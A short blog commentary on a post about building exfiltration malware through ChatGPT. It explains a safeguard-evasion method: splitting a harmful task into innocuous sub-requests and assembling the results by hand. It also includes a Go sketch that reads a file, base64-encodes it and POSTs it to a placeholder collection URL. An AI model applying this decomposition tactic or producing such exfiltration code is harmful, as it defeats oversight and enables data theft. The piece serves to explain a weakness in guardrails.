Slip Through OpenAI Guardrails by Breaking Up Tasks

Evading AI Guardrails: Crafting Malware with ChatGPT's Assistance

In a poorly titled blog post (“I built a Zero Day with undetectable exfiltration using only ChatGPT prompts”), the author describes how he created a bog-standard exfiltration tool in the Go programming language using ChatGPT (this is not a Zero Day where I come from…).

The overall purpose of this exercise was to prove two things:

1. How easy it is to evade the insufficient guardrails that ChatGPT has in place
2. How easy it is to create advanced malware without writing any code, using only ChatGPT

Hype aside, the observation worth noting is the bottom-up tasking tactic the author employed with ChatGPT. AI safety controls struggle to discern intent if you break your task into a set of smaller tasks, sequence them from the innermost detail to the outermost, and assemble the pieces yourself: each request looks innocuous on its own, and only the finished assembly reveals the purpose. It’s not a new tactic by any means - think of early TCP/IP network intrusion detection evasion, where attacks were fragmented across packets so that no single packet tripped a signature. Or, if you’re a James Bond fan, “The Man with the Golden Gun”, where the weapon is assembled from a pen, a lighter, and a cigarette case. But it’s a keeper, since I don’t see this getting solved anytime soon.
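To make the tactic concrete, here is a minimal sketch in Go of how three individually innocuous snippets - read a file, encode some bytes, POST a string to a URL - compose into the kind of bog-standard exfiltration tool the post describes. This is not the author's actual code; the filename and URL are placeholders of my own, and each function is the sort of request a model answers without a second thought.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"fmt"
	"net/http"
	"os"
)

// Piece 1: an innocuous "read a file" prompt.
func readFile(path string) ([]byte, error) {
	return os.ReadFile(path)
}

// Piece 2: an innocuous "base64-encode these bytes" prompt.
func encode(data []byte) string {
	return base64.StdEncoding.EncodeToString(data)
}

// Piece 3: an innocuous "POST a string to a URL" prompt.
func upload(url, payload string) error {
	resp, err := http.Post(url, "text/plain", bytes.NewBufferString(payload))
	if err != nil {
		return err
	}
	defer resp.Body.Close()
	return nil
}

// Assembled by hand: none of the three prompts ever mentions
// exfiltration, but chained together they are the whole tool.
func main() {
	data, err := readFile("secrets.txt") // placeholder filename
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	if err := upload("https://example.com/collect", encode(data)); err != nil { // placeholder URL
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
}
```

The point is not the code, which is trivial, but that no single prompt needed to mention the overall goal at all - which is exactly why per-prompt guardrails miss it.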